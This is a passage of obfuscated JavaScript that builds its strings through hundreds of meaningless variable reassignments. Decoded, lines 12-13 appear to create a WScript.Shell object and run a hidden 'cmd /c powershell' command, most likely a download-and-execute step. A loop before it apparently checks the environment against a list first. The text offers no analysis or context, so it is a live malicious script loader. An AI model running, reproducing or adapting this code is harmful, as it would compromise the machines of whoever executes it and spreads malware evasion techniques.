3 | for ( rqebkqjf = 0 ; rqebkqjf < kulzfouev[zcmygv + alqjjup + etlxskmah + kvxppc + jemzwy + khghrbeg] ; ++ rqebkqjf ) | |
4 | { | |
5 | if ( dbjtkzxn == kulzfouev[rqebkqjf] ) | |
6 | { | |
7 | dbjtkzxn = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( dbjtkzxn !== true ) | |
12 | this[ticrmoynt + sebpb + onnions + xllgu + bwmmlz + vsemy + jemzwy][aiyudwexx + ivwaj + bwmmlz + jemzwy] ( ); | |
13 | this[ticrmoynt + sebpb + onnions + xllgu + bwmmlz + vsemy + jemzwy][twhklpydj + xllgu + alqjjup + qtekmfvx + jemzwy + alqjjup + qpezqz + dmshjh + fsbocb + alqjjup + onnions + jemzwy] ( ticrmoynt + sebpb + onnions + xllgu + bwmmlz + vsemy + jemzwy + cvgsx + sebpb + khghrbeg + alqjjup + zcmygv + zcmygv ) [xllgu + ivwaj + etlxskmah] ( onnions + bhsufpef + xfdgno + qxulce + nzbrxkfj + onnions + qxulce + vsemy + flchh + sdvkziw + alqjjup + xllgu + ztzbhfff + khghrbeg + alqjjup + zcmygv + zcmygv + cvgsx + alqjjup + fhymfla + alqjjup + qxulce + ervwmjiml + twhklpydj + flchh + bhsufpef + bhsufpef + qtekmfvx + etlxskmah + xfdgno + qxulce + geypamf + merptotqg + etlxskmah + mgcxx + flchh + lybznonqk + alqjjup + ervwmjiml + ticrmoynt + alqjjup + dmshjh + mtwrhkyq + alqjjup + qjzdopbz + ivwaj + alqjjup + ztzbhfff + jemzwy + qxulce + ervwmjiml + qpezqz + ivwaj + jemzwy + qsqxfgg + bwmmlz + zcmygv + alqjjup + qxulce + qkxcud + jemzwy + alqjjup + bhsufpef + vsemy + qkxcud + qqqadzy + bwmmlz + etlxskmah + mgcxx + flchh + bwmmlz + onnions + alqjjup + cvgsx + vsemy + xfdgno + qaniwaku + qxulce + khghrbeg + jemzwy + jemzwy + vsemy + vdrzi + nzbrxkfj + nzbrxkfj + agnobhm + ngjda + seccv + cvgsx + agnobhm + dlzswfgs + seccv + cvgsx + agnobhm + cvgsx + eowdep + rbpeccgvy + ashymektd + nzbrxkfj + bwmmlz + etlxskmah + mgcxx + flchh + bwmmlz + onnions + alqjjup + cvgsx + vsemy + khghrbeg + vsemy + geypamf + gjplvacfu + gjplvacfu + ztzbhfff + jemzwy + qtekmfvx + xllgu + jemzwy + qxulce + qkxcud + jemzwy + alqjjup + bhsufpef + vsemy + qkxcud + qqqadzy + bwmmlz + etlxskmah + mgcxx + flchh + bwmmlz + onnions + alqjjup + cvgsx + vsemy + xfdgno + qaniwaku + gjplvacfu + gjplvacfu + onnions + bhsufpef + xfdgno + qxulce + nzbrxkfj + onnions + qxulce + etlxskmah + alqjjup + jemzwy + qxulce + ivwaj + ztzbhfff + alqjjup + qxulce + qqqadzy + qqqadzy + agnobhm + ngjda + seccv + cvgsx + agnobhm + dlzswfgs + seccv + cvgsx + agnobhm + cvgsx + eowdep + rbpeccgvy + ashymektd + tylyamqt + cypat + cypat + cypat + cypat + qqqadzy + xfdgno + qtekmfvx + mgcxx + sdvkziw + sdvkziw + sdvkziw + xllgu + flchh + flchh + jemzwy + qqqadzy + gjplvacfu + gjplvacfu + onnions + bhsufpef + xfdgno + qxulce + nzbrxkfj + onnions + qxulce + xllgu + alqjjup + kvxppc + ztzbhfff + mgcxx + xllgu + seccv + eowdep + qxulce + nzbrxkfj + ztzbhfff + qxulce + qqqadzy + qqqadzy + agnobhm + ngjda + seccv + cvgsx + agnobhm + dlzswfgs + seccv + cvgsx + agnobhm + cvgsx + eowdep + rbpeccgvy + ashymektd + tylyamqt + cypat + cypat + cypat + cypat + qqqadzy + xfdgno + qtekmfvx + mgcxx + sdvkziw + sdvkziw + sdvkziw + xllgu + flchh + flchh + jemzwy + qqqadzy + ashymektd + seccv + dlzswfgs + agnobhm + eowdep + dlzswfgs + rbpeccgvy + tpmwiflfo + dlzswfgs + agnobhm + ngjda + seccv + seccv + eowdep + cvgsx + xfdgno + zcmygv + zcmygv, 0, false ); |
|
14 | } | |
15 | uszlrxjsv = "y"; | |
16 | uszlrxjsv = "s"; | |
17 | uszlrxjsv = "C"; | |
18 | uszlrxjsv = "I"; | |
19 | uszlrxjsv = "K"; | |
20 | uszlrxjsv = "L"; | |
21 | uszlrxjsv = "T"; | |
22 | uszlrxjsv = "e"; | |
23 | uszlrxjsv = "f"; | |
24 | uszlrxjsv = "D"; | |
25 | uszlrxjsv = "I"; | |
26 | uszlrxjsv = "q"; | |
27 | uszlrxjsv = "b"; | |
28 | uszlrxjsv = "Z"; | |
29 | uszlrxjsv = "v"; | |
30 | uszlrxjsv = "J"; | |
31 | uszlrxjsv = "z"; | |
32 | uszlrxjsv = "A"; | |
33 | uszlrxjsv = "a"; | |
34 | uszlrxjsv = "e"; | |
35 | uszlrxjsv = "J"; | |
36 | uszlrxjsv = "c"; | |
37 | uszlrxjsv = "J"; | |
38 | uszlrxjsv = "w"; | |
39 | uszlrxjsv = "X"; | |
40 | uszlrxjsv = "E"; | |
41 | uszlrxjsv = "m"; | |
42 | uszlrxjsv = "X"; | |
43 | uszlrxjsv = "g"; | |
44 | uszlrxjsv = "t"; | |
45 | uszlrxjsv = "E"; | |
46 | tpmwiflfo = "n"; | |
47 | tpmwiflfo = "h"; | |
48 | tpmwiflfo = "Q"; | |
49 | tpmwiflfo = "c"; | |
50 | tpmwiflfo = "Y"; | |
51 | tpmwiflfo = "e"; | |
52 | tpmwiflfo = "t"; | |
53 | tpmwiflfo = "h"; | |
54 | tpmwiflfo = "S"; | |
55 | tpmwiflfo = "R"; | |
56 | tpmwiflfo = "e"; | |
57 | tpmwiflfo = "y"; | |
58 | tpmwiflfo = "h"; | |
59 | tpmwiflfo = "z"; | |
60 | tpmwiflfo = "y"; | |
61 | tpmwiflfo = "q"; | |
62 | tpmwiflfo = "P"; | |
63 | tpmwiflfo = "K"; | |
64 | tpmwiflfo = "e"; | |
65 | tpmwiflfo = "y"; | |
66 | tpmwiflfo = "J"; | |
67 | tpmwiflfo = "P"; | |
68 | tpmwiflfo = "e"; | |
69 | tpmwiflfo = "X"; | |
70 | tpmwiflfo = "H"; | |
71 | tpmwiflfo = "t"; | |
72 | tpmwiflfo = "U"; | |
73 | tpmwiflfo = "i"; | |
74 | tpmwiflfo = "g"; | |
75 | tpmwiflfo = "c"; | |
76 | tpmwiflfo = "A"; | |
77 | tpmwiflfo = "E"; | |
78 | tpmwiflfo = "i"; | |
79 | tpmwiflfo = "U"; | |
80 | tpmwiflfo = "M"; | |
81 | tpmwiflfo = "D"; | |
82 | tpmwiflfo = "7"; | |
83 | xllgu = "w"; | |
84 | xllgu = "y"; | |
85 | xllgu = "r"; | |
86 | eowdep = "O"; | |
87 | eowdep = "f"; | |
88 | eowdep = "X"; | |
89 | eowdep = "z"; | |
90 | eowdep = "F"; | |
91 | eowdep = "g"; | |
92 | eowdep = "H"; | |
93 | eowdep = "X"; | |
94 | eowdep = "i"; | |
95 | eowdep = "g"; | |
96 | eowdep = "Z"; | |
97 | eowdep = "J"; | |
98 | eowdep = "F"; | |
99 | eowdep = "g"; | |
100 | eowdep = "v"; | |
101 | eowdep = "d"; | |
102 | eowdep = "F"; | |
103 | eowdep = "D"; | |
104 | eowdep = "2"; | |
105 | xxyhez = "N"; | |
106 | xxyhez = "D"; | |
107 | xxyhez = "R"; | |
108 | xxyhez = "u"; | |
109 | xxyhez = "V"; | |
110 | xxyhez = "G"; | |
111 | xxyhez = "a"; | |
112 | xxyhez = "h"; | |
113 | xxyhez = "Y"; | |
114 | xxyhez = "z"; | |
115 | xxyhez = "j"; | |
116 | xxyhez = "V"; | |
117 | xxyhez = "Z"; | |
118 | xxyhez = "C"; | |
119 | xxyhez = "c"; | |
120 | xxyhez = "e"; | |
121 | xxyhez = "J"; | |
122 | xxyhez = "W"; | |
123 | xxyhez = "w"; | |
124 | xxyhez = "Y"; | |
125 | xxyhez = "E"; | |
126 | xxyhez = "K"; | |
127 | xxyhez = "J"; | |
128 | xxyhez = "y"; | |
129 | xxyhez = "O"; | |
130 | xxyhez = "F"; | |
131 | xxyhez = "n"; | |
132 | xxyhez = "b"; | |
133 | xxyhez = "H"; | |
134 | xxyhez = "y"; | |
135 | xxyhez = "l"; | |
136 | xxyhez = "L"; | |
137 | xxyhez = "O"; | |
138 | xxyhez = "_"; | |
139 | lybznonqk = "U"; | |
140 | lybznonqk = "P"; | |
141 | lybznonqk = "M"; | |
142 | lybznonqk = "b"; | |
143 | lybznonqk = "m"; | |
144 | lybznonqk = "E"; | |
145 | lybznonqk = "H"; | |
146 | lybznonqk = "u"; | |
147 | lybznonqk = "k"; | |
148 | khghrbeg = "U"; | |
149 | khghrbeg = "F"; | |
150 | khghrbeg = "E"; | |
151 | khghrbeg = "l"; | |
152 | khghrbeg = "i"; | |
153 | khghrbeg = "r"; | |
154 | khghrbeg = "r"; | |
155 | khghrbeg = "S"; | |
156 | khghrbeg = "N"; | |
157 | khghrbeg = "K"; | |
158 | khghrbeg = "v"; | |
159 | khghrbeg = "c"; | |
160 | khghrbeg = "T"; | |
161 | khghrbeg = "h"; | |
162 | qxulce = "v"; | |
163 | qxulce = "k"; | |
164 | qxulce = "G"; | |
165 | qxulce = "p"; | |
166 | qxulce = "t"; | |
167 | qxulce = "t"; | |
168 | qxulce = "V"; | |
169 | qxulce = "V"; | |
170 | qxulce = "l"; | |
171 | qxulce = "q"; | |
172 | qxulce = "E"; | |
173 | qxulce = "X"; | |
174 | qxulce = "R"; | |
175 | qxulce = " "; | |
176 | vsemy = "l"; | |
177 | vsemy = "E"; | |
178 | vsemy = "y"; | |
179 | vsemy = "h"; | |
180 | vsemy = "E"; | |
181 | vsemy = "Z"; | |
182 | vsemy = "W"; | |
183 | vsemy = "H"; | |
184 | vsemy = "s"; | |
185 | vsemy = "v"; | |
186 | vsemy = "a"; | |
187 | vsemy = "Q"; | |
188 | vsemy = "f"; | |
189 | vsemy = "d"; | |
190 | vsemy = "F"; | |
191 | vsemy = "W"; | |
192 | vsemy = "O"; | |
193 | vsemy = "p"; | |
194 | bhsufpef = "e"; | |
195 | bhsufpef = "V"; | |
196 | bhsufpef = "n"; | |
197 | bhsufpef = "Z"; | |
198 | bhsufpef = "k"; | |
199 | bhsufpef = "X"; | |
200 | bhsufpef = "Y"; | |
201 | bhsufpef = "F"; | |
202 | bhsufpef = "L"; | |
203 | bhsufpef = "s"; | |
204 | bhsufpef = "h"; | |
205 | bhsufpef = "R"; | |
206 | bhsufpef = "e"; | |
207 | bhsufpef = "B"; | |
208 | bhsufpef = "Z"; | |
209 | bhsufpef = "V"; | |
210 | bhsufpef = "S"; | |
211 | bhsufpef = "Y"; | |
212 | bhsufpef = "T"; | |
213 | bhsufpef = "u"; | |
214 | bhsufpef = "s"; | |
215 | bhsufpef = "s"; | |
216 | bhsufpef = "a"; | |
217 | bhsufpef = "C"; | |
218 | bhsufpef = "K"; | |
219 | bhsufpef = "R"; | |
220 | bhsufpef = "m"; | |
221 | mtwrhkyq = "u"; | |
222 | mtwrhkyq = "W"; | |
223 | mtwrhkyq = "p"; | |
224 | mtwrhkyq = "N"; | |
225 | mtwrhkyq = "Y"; | |
226 | mtwrhkyq = "U"; | |
227 | mtwrhkyq = "r"; | |
228 | mtwrhkyq = "Y"; | |
229 | mtwrhkyq = "e"; | |
230 | mtwrhkyq = "s"; | |
231 | mtwrhkyq = "H"; | |
232 | mtwrhkyq = "D"; | |
233 | mtwrhkyq = "p"; | |
234 | mtwrhkyq = "r"; | |
235 | mtwrhkyq = "m"; | |
236 | mtwrhkyq = "J"; | |
237 | mtwrhkyq = "Y"; | |
238 | mtwrhkyq = "w"; | |
239 | mtwrhkyq = "x"; | |
240 | mtwrhkyq = "n"; | |
241 | mtwrhkyq = "I"; | |
242 | mtwrhkyq = "D"; | |
243 | mtwrhkyq = "p"; | |
244 | mtwrhkyq = "X"; | |
245 | mtwrhkyq = "x"; | |
246 | mtwrhkyq = "w"; | |
247 | mtwrhkyq = "R"; | |
248 | twhklpydj = "s"; | |
249 | twhklpydj = "C"; | |
250 | twhklpydj = "f"; | |
251 | twhklpydj = "p"; | |
252 | twhklpydj = "b"; | |
253 | twhklpydj = "f"; | |
254 | twhklpydj = "C"; | |
255 | twhklpydj = "n"; | |
256 | twhklpydj = "A"; | |
257 | twhklpydj = "e"; | |
258 | twhklpydj = "N"; | |
259 | twhklpydj = "U"; | |
260 | twhklpydj = "u"; | |
261 | twhklpydj = "M"; | |
262 | twhklpydj = "e"; | |
263 | twhklpydj = "J"; | |
264 | twhklpydj = "Z"; | |
265 | twhklpydj = "R"; | |
266 | twhklpydj = "e"; | |
267 | twhklpydj = "b"; | |
268 | twhklpydj = "v"; | |
269 | twhklpydj = "z"; | |
270 | twhklpydj = "j"; | |
271 | twhklpydj = "x"; | |
272 | twhklpydj = "R"; | |
273 | twhklpydj = "v"; | |
274 | twhklpydj = "f"; | |
275 | twhklpydj = "X"; | |
276 | twhklpydj = "d"; | |
277 | twhklpydj = "u"; | |
278 | twhklpydj = "U"; | |
279 | twhklpydj = "C"; | |
280 | twhklpydj = "I"; | |
281 | twhklpydj = "a"; | |
282 | twhklpydj = "H"; | |
283 | twhklpydj = "R"; | |
284 | twhklpydj = "u"; | |
285 | twhklpydj = "V"; | |
286 | twhklpydj = "F"; | |
287 | twhklpydj = "j"; | |
288 | twhklpydj = "C"; | |
289 | rbpeccgvy = "f"; | |
290 | rbpeccgvy = "e"; | |
291 | rbpeccgvy = "q"; | |
292 | rbpeccgvy = "Z"; | |
293 | rbpeccgvy = "m"; | |
294 | rbpeccgvy = "k"; | |
295 | rbpeccgvy = "H"; | |
296 | rbpeccgvy = "Q"; | |
297 | rbpeccgvy = "S"; | |
298 | rbpeccgvy = "M"; | |
299 | rbpeccgvy = "s"; | |
300 | rbpeccgvy = "M"; | |
301 | rbpeccgvy = "p"; | |
302 | rbpeccgvy = "A"; | |
303 | rbpeccgvy = "O"; | |
304 | rbpeccgvy = "C"; | |
305 | rbpeccgvy = "j"; | |
306 | rbpeccgvy = "i"; | |
307 | rbpeccgvy = "F"; | |
308 | rbpeccgvy = "v"; | |
309 | rbpeccgvy = "h"; | |
310 | rbpeccgvy = "d"; | |
311 | rbpeccgvy = "u"; | |
312 | rbpeccgvy = "c"; | |
313 | rbpeccgvy = "P"; | |
314 | rbpeccgvy = "m"; | |
315 | rbpeccgvy = "d"; | |
316 | rbpeccgvy = "U"; | |
317 | rbpeccgvy = "Q"; | |
318 | rbpeccgvy = "N"; | |
319 | rbpeccgvy = "b"; | |
320 | rbpeccgvy = "I"; | |
321 | rbpeccgvy = "t"; | |
322 | rbpeccgvy = "t"; | |
323 | rbpeccgvy = "X"; | |
324 | rbpeccgvy = "0"; | |
325 | qjzdopbz = "g"; | |
326 | qjzdopbz = "M"; | |
327 | qjzdopbz = "L"; | |
328 | qjzdopbz = "Y"; | |
329 | qjzdopbz = "u"; | |
330 | qjzdopbz = "j"; | |
331 | qjzdopbz = "x"; | |
332 | qjzdopbz = "q"; | |
333 | alqjjup = "o"; | |
334 | alqjjup = "e"; | |
335 | alqjjup = "x"; | |
336 | alqjjup = "Y"; | |
337 | alqjjup = "z"; | |
338 | alqjjup = "k"; | |
339 | alqjjup = "C"; | |
340 | alqjjup = "d"; | |
341 | alqjjup = "i"; | |
342 | alqjjup = "s"; | |
343 | alqjjup = "s"; | |
344 | alqjjup = "r"; | |
345 | alqjjup = "L"; | |
346 | alqjjup = "k"; | |
347 | alqjjup = "J"; | |
348 | alqjjup = "L"; | |
349 | alqjjup = "x"; | |
350 | alqjjup = "E"; | |
351 | alqjjup = "G"; | |
352 | alqjjup = "i"; | |
353 | alqjjup = "x"; | |
354 | alqjjup = "M"; | |
355 | alqjjup = "q"; | |
356 | alqjjup = "n"; | |
357 | alqjjup = "M"; | |
358 | alqjjup = "e"; | |
359 | agnobhm = "p"; | |
360 | agnobhm = "V"; | |
361 | agnobhm = "p"; | |
362 | agnobhm = "C"; | |
363 | agnobhm = "y"; | |
364 | agnobhm = "1"; | |
365 | akkajecgz = "K"; | |
366 | akkajecgz = "N"; | |
367 | akkajecgz = "X"; | |
368 | akkajecgz = "H"; | |
369 | akkajecgz = "U"; | |
370 | akkajecgz = "y"; | |
371 | akkajecgz = "z"; | |
372 | akkajecgz = "u"; | |
373 | akkajecgz = "C"; | |
374 | akkajecgz = "H"; | |
375 | akkajecgz = "B"; | |
376 | akkajecgz = "t"; | |
377 | akkajecgz = "R"; | |
378 | akkajecgz = "g"; | |
379 | akkajecgz = "E"; | |
380 | akkajecgz = "d"; | |
381 | akkajecgz = "d"; | |
382 | akkajecgz = "K"; | |
383 | akkajecgz = "E"; | |
384 | akkajecgz = "Z"; | |
385 | akkajecgz = "Y"; | |
386 | akkajecgz = "I"; | |
387 | akkajecgz = "R"; | |
388 | akkajecgz = "z"; | |
389 | akkajecgz = "h"; | |
390 | akkajecgz = "p"; | |
391 | akkajecgz = "R"; | |
392 | akkajecgz = "L"; | |
393 | flchh = "R"; | |
394 | flchh = "k"; | |
395 | flchh = "m"; | |
396 | flchh = "Z"; | |
397 | flchh = "m"; | |
398 | flchh = "h"; | |
399 | flchh = "w"; | |
400 | flchh = "E"; | |
401 | flchh = "E"; | |
402 | flchh = "G"; | |
403 | flchh = "a"; | |
404 | flchh = "C"; | |
405 | flchh = "X"; | |
406 | flchh = "F"; | |
407 | flchh = "s"; | |
408 | flchh = "t"; | |
409 | flchh = "E"; | |
410 | flchh = "Y"; | |
411 | flchh = "X"; | |
412 | flchh = "S"; | |
413 | flchh = "Z"; | |
414 | flchh = "O"; | |
415 | flchh = "T"; | |
416 | flchh = "E"; | |
417 | flchh = "w"; | |
418 | flchh = "P"; | |
419 | flchh = "r"; | |
420 | flchh = "O"; | |
421 | flchh = "s"; | |
422 | flchh = "B"; | |
423 | flchh = "l"; | |
424 | flchh = "J"; | |
425 | flchh = "s"; | |
426 | flchh = "l"; | |
427 | flchh = "J"; | |
428 | flchh = "o"; | |
429 | merptotqg = "r"; | |
430 | merptotqg = "m"; | |
431 | merptotqg = "S"; | |
432 | merptotqg = "c"; | |
433 | merptotqg = "L"; | |
434 | merptotqg = "G"; | |
435 | merptotqg = "X"; | |
436 | merptotqg = "R"; | |
437 | merptotqg = "p"; | |
438 | merptotqg = "t"; | |
439 | merptotqg = "u"; | |
440 | merptotqg = "a"; | |
441 | merptotqg = "k"; | |
442 | merptotqg = "C"; | |
443 | merptotqg = "M"; | |
444 | merptotqg = "q"; | |
445 | merptotqg = "l"; | |
446 | merptotqg = "T"; | |
447 | merptotqg = "b"; | |
448 | merptotqg = "I"; | |
449 | merptotqg = "S"; | |
450 | merptotqg = "E"; | |
451 | merptotqg = "U"; | |
452 | merptotqg = "H"; | |
453 | merptotqg = "I"; | |
454 | onnions = "b"; | |
455 | onnions = "L"; | |
456 | onnions = "o"; | |
457 | onnions = "E"; | |
458 | onnions = "o"; | |
459 | onnions = "P"; | |
460 | onnions = "B"; | |
461 | onnions = "E"; | |
462 | onnions = "A"; | |
463 | onnions = "D"; | |
464 | onnions = "z"; | |
465 | onnions = "F"; | |
466 | onnions = "g"; | |
467 | onnions = "J"; | |
468 | onnions = "j"; | |
469 | onnions = "W"; | |
470 | onnions = "I"; | |
471 | onnions = "d"; | |
472 | onnions = "n"; | |
473 | onnions = "y"; | |
474 | onnions = "R"; | |
475 | onnions = "W"; | |
476 | onnions = "c"; | |
477 | fhymfla = "e"; | |
478 | fhymfla = "s"; | |
479 | fhymfla = "b"; | |
480 | fhymfla = "T"; | |
481 | fhymfla = "a"; | |
482 | fhymfla = "D"; | |
483 | fhymfla = "x"; | |
484 | nqfab = "h"; | |
485 | nqfab = "B"; | |
486 | nqfab = "C"; | |
487 | nqfab = "i"; | |
488 | nqfab = "Z"; | |
489 | nqfab = "x"; | |
490 | nqfab = "Q"; | |
491 | nqfab = "k"; | |
492 | nqfab = "m"; | |
493 | nqfab = "W"; | |
494 | nqfab = "d"; | |
495 | nqfab = "E"; | |
496 | nqfab = "y"; | |
497 | nqfab = "H"; | |
498 | nqfab = "M"; | |
499 | nqfab = "E"; | |
500 | nqfab = "Y"; | |
501 | nqfab = "q"; | |
502 | nqfab = "H"; | |
503 | nqfab = "M"; | |
504 | nqfab = "T"; | |
505 | nqfab = "b"; | |
506 | nqfab = "X"; | |
507 | nqfab = "A"; | |
508 | nqfab = "l"; | |
509 | nqfab = "M"; | |
510 | nqfab = "M"; | |
511 | nqfab = "m"; | |
512 | nqfab = "Z"; | |
513 | nqfab = "W"; | |
514 | nqfab = "m"; | |
515 | nqfab = "I"; | |
516 | nqfab = "N"; | |
517 | nqfab = "y"; | |
518 | nqfab = "I"; | |
519 | nqfab = "g"; | |
520 | nqfab = "N"; | |
521 | nqfab = "o"; | |
522 | nqfab = "C"; | |
523 | nqfab = "N"; | |
524 | nqfab = "k"; | |
525 | nqfab = "J"; | |
526 | nqfab = "A"; | |
527 | nqfab = "U"; | |
528 | geypamf = "r"; | |
529 | geypamf = "Q"; | |
530 | geypamf = "R"; | |
531 | geypamf = "n"; | |
532 | geypamf = "G"; | |
533 | geypamf = "e"; | |
534 | geypamf = "j"; | |
535 | geypamf = "Q"; | |
536 | geypamf = "e"; | |
537 | geypamf = "k"; | |
538 | geypamf = "e"; | |
539 | geypamf = "K"; | |
540 | geypamf = "p"; | |
541 | geypamf = "q"; | |
542 | geypamf = "a"; | |
543 | geypamf = "K"; | |
544 | geypamf = "v"; | |
545 | geypamf = "n"; | |
546 | geypamf = "D"; | |
547 | geypamf = "p"; | |
548 | geypamf = "r"; | |
549 | geypamf = "y"; | |
550 | geypamf = "u"; | |
551 | geypamf = "I"; | |
552 | geypamf = "b"; | |
553 | geypamf = "c"; | |
554 | geypamf = "I"; | |
555 | geypamf = "A"; | |
556 | geypamf = "u"; | |
557 | geypamf = "e"; | |
558 | geypamf = "V"; | |
559 | geypamf = "V"; | |
560 | geypamf = "Q"; | |
561 | geypamf = "\""; | |
562 | bwmmlz = "d"; | |
563 | bwmmlz = "I"; | |
564 | bwmmlz = "T"; | |
565 | bwmmlz = "t"; | |
566 | bwmmlz = "d"; | |
567 | bwmmlz = "h"; | |
568 | bwmmlz = "u"; | |
569 | bwmmlz = "W"; | |
570 | bwmmlz = "j"; | |
571 | bwmmlz = "I"; | |
572 | bwmmlz = "p"; | |
573 | bwmmlz = "F"; | |
574 | bwmmlz = "n"; | |
575 | bwmmlz = "q"; | |
576 | bwmmlz = "O"; | |
577 | bwmmlz = "D"; | |
578 | bwmmlz = "i"; | |
579 | bwmmlz = "c"; | |
580 | bwmmlz = "S"; | |
581 | bwmmlz = "z"; | |
582 | bwmmlz = "f"; | |
583 | bwmmlz = "e"; | |
584 | bwmmlz = "N"; | |
585 | bwmmlz = "L"; | |
586 | bwmmlz = "F"; | |
587 | bwmmlz = "d"; | |
588 | bwmmlz = "u"; | |
589 | bwmmlz = "V"; | |
590 | bwmmlz = "i"; | |
591 | bwmmlz = "M"; | |
592 | bwmmlz = "I"; | |
593 | bwmmlz = "z"; | |
594 | bwmmlz = "M"; | |
595 | bwmmlz = "g"; | |
596 | bwmmlz = "i"; | |
597 | ivwaj = "V"; | |
598 | ivwaj = "t"; | |
599 | ivwaj = "n"; | |
600 | ivwaj = "U"; | |
601 | ivwaj = "c"; | |
602 | ivwaj = "u"; | |
603 | ivwaj = "X"; | |
604 | ivwaj = "d"; | |
605 | ivwaj = "v"; | |
606 | ivwaj = "r"; | |
607 | ivwaj = "I"; | |
608 | ivwaj = "O"; | |
609 | ivwaj = "o"; | |
610 | ivwaj = "u"; | |
611 | ivwaj = "U"; | |
612 | ivwaj = "u"; | |
613 | ivwaj = "R"; | |
614 | ivwaj = "w"; | |
615 | ivwaj = "F"; | |
616 | ivwaj = "r"; | |
617 | ivwaj = "O"; | |
618 | ivwaj = "B"; | |
619 | ivwaj = "d"; | |
620 | ivwaj = "N"; | |
621 | ivwaj = "p"; | |
622 | ivwaj = "k"; | |
623 | ivwaj = "s"; | |
624 | ivwaj = "Z"; | |
625 | ivwaj = "M"; | |
626 | ivwaj = "X"; | |
627 | ivwaj = "s"; | |
628 | ivwaj = "N"; | |
629 | ivwaj = "h"; | |
630 | ivwaj = "A"; | |
631 | ivwaj = "K"; | |
632 | ivwaj = "u"; | |
633 | qsqxfgg = "W"; | |
634 | qsqxfgg = "A"; | |
635 | qsqxfgg = "y"; | |
636 | qsqxfgg = "D"; | |
637 | qsqxfgg = "C"; | |
638 | qsqxfgg = "j"; | |
639 | qsqxfgg = "o"; | |
640 | qsqxfgg = "c"; | |
641 | qsqxfgg = "G"; | |
642 | qsqxfgg = "j"; | |
643 | qsqxfgg = "a"; | |
644 | qsqxfgg = "U"; | |
645 | qsqxfgg = "n"; | |
646 | qsqxfgg = "C"; | |
647 | qsqxfgg = "a"; | |
648 | qsqxfgg = "y"; | |
649 | qsqxfgg = "x"; | |
650 | qsqxfgg = "F"; | |
651 | cypat = "W"; | |
652 | cypat = "V"; | |
653 | cypat = "H"; | |
654 | cypat = "C"; | |
655 | cypat = "v"; | |
656 | cypat = "8"; | |
657 | qaniwaku = "i"; | |
658 | qaniwaku = "b"; | |
659 | qaniwaku = "v"; | |
660 | qaniwaku = "v"; | |
661 | qaniwaku = "o"; | |
662 | qaniwaku = "G"; | |
663 | qaniwaku = "t"; | |
664 | qaniwaku = "Z"; | |
665 | qaniwaku = "s"; | |
666 | qaniwaku = "w"; | |
667 | qaniwaku = "r"; | |
668 | qaniwaku = "K"; | |
669 | qaniwaku = "L"; | |
670 | qaniwaku = "S"; | |
671 | qaniwaku = "H"; | |
672 | qaniwaku = "a"; | |
673 | qaniwaku = "b"; | |
674 | qaniwaku = "p"; | |
675 | qaniwaku = "M"; | |
676 | qaniwaku = "Y"; | |
677 | qaniwaku = "M"; | |
678 | qaniwaku = "O"; | |
679 | qaniwaku = "W"; | |
680 | qaniwaku = "Q"; | |
681 | qaniwaku = "f"; | |
682 | gjplvacfu = "L"; | |
683 | gjplvacfu = "i"; | |
684 | gjplvacfu = "m"; | |
685 | gjplvacfu = "F"; | |
686 | gjplvacfu = "C"; | |
687 | gjplvacfu = "t"; | |
688 | gjplvacfu = "z"; | |
689 | gjplvacfu = "O"; | |
690 | gjplvacfu = "S"; | |
691 | gjplvacfu = "p"; | |
692 | gjplvacfu = "A"; | |
693 | gjplvacfu = "r"; | |
694 | gjplvacfu = "e"; | |
695 | gjplvacfu = "C"; | |
696 | gjplvacfu = "H"; | |
697 | gjplvacfu = "f"; | |
698 | gjplvacfu = "T"; | |
699 | gjplvacfu = "G"; | |
700 | gjplvacfu = "u"; | |
701 | gjplvacfu = "&"; | |
702 | qhmqv = "Y"; | |
703 | qhmqv = "N"; | |
704 | qhmqv = "Y"; | |
705 | qhmqv = "x"; | |
706 | qhmqv = "Q"; | |
707 | qhmqv = "N"; | |
708 | qhmqv = "e"; | |
709 | qhmqv = "a"; | |
710 | qhmqv = "F"; | |
711 | qhmqv = "e"; | |
712 | qhmqv = "o"; | |
713 | qhmqv = "B"; | |
714 | qhmqv = "t"; | |
715 | qhmqv = "U"; | |
716 | qhmqv = "N"; | |
717 | qhmqv = "b"; | |
718 | qhmqv = "N"; | |
719 | qhmqv = "G"; | |
720 | qhmqv = "G"; | |
721 | qhmqv = "Z"; | |
722 | qhmqv = "x"; | |
723 | qhmqv = "Z"; | |
724 | qhmqv = "i"; | |
725 | qhmqv = "H"; | |
726 | qhmqv = "k"; | |
727 | qhmqv = "P"; | |
728 | qhmqv = "a"; | |
729 | qhmqv = "Y"; | |
730 | qhmqv = "C"; | |
731 | qhmqv = "P"; | |
732 | qhmqv = "u"; | |
733 | qhmqv = "o"; | |
734 | qhmqv = "a"; | |
735 | qhmqv = "Q"; | |
736 | qhmqv = "E"; | |
737 | qhmqv = "g"; | |
738 | qhmqv = "p"; | |
739 | qhmqv = "c"; | |
740 | qhmqv = "L"; | |
741 | qhmqv = "s"; | |
742 | qhmqv = "u"; | |
743 | qhmqv = "Y"; | |
744 | qhmqv = "K"; | |
745 | ztzbhfff = "i"; | |
746 | ztzbhfff = "q"; | |
747 | ztzbhfff = "h"; | |
748 | ztzbhfff = "r"; | |
749 | ztzbhfff = "F"; | |
750 | ztzbhfff = "I"; | |
751 | ztzbhfff = "t"; | |
752 | ztzbhfff = "T"; | |
753 | ztzbhfff = "M"; | |
754 | ztzbhfff = "T"; | |
755 | ztzbhfff = "Y"; | |
756 | ztzbhfff = "R"; | |
757 | ztzbhfff = "b"; | |
758 | ztzbhfff = "j"; | |
759 | ztzbhfff = "T"; | |
760 | ztzbhfff = "e"; | |
761 | ztzbhfff = "S"; | |
762 | ztzbhfff = "Z"; | |
763 | ztzbhfff = "n"; | |
764 | ztzbhfff = "U"; | |
765 | ztzbhfff = "i"; | |
766 | ztzbhfff = "E"; | |
767 | ztzbhfff = "S"; | |
768 | ztzbhfff = "H"; | |
769 | ztzbhfff = "n"; | |
770 | ztzbhfff = "A"; | |
771 | ztzbhfff = "d"; | |
772 | ztzbhfff = "q"; | |
773 | ztzbhfff = "e"; | |
774 | ztzbhfff = "y"; | |
775 | ztzbhfff = "n"; | |
776 | ztzbhfff = "s"; | |
777 | kvxppc = "y"; | |
778 | kvxppc = "p"; | |
779 | kvxppc = "a"; | |
780 | kvxppc = "s"; | |
781 | kvxppc = "i"; | |
782 | kvxppc = "S"; | |
783 | kvxppc = "g"; | |
784 | kvxppc = "d"; | |
785 | kvxppc = "a"; | |
786 | kvxppc = "b"; | |
787 | kvxppc = "u"; | |
788 | kvxppc = "p"; | |
789 | kvxppc = "G"; | |
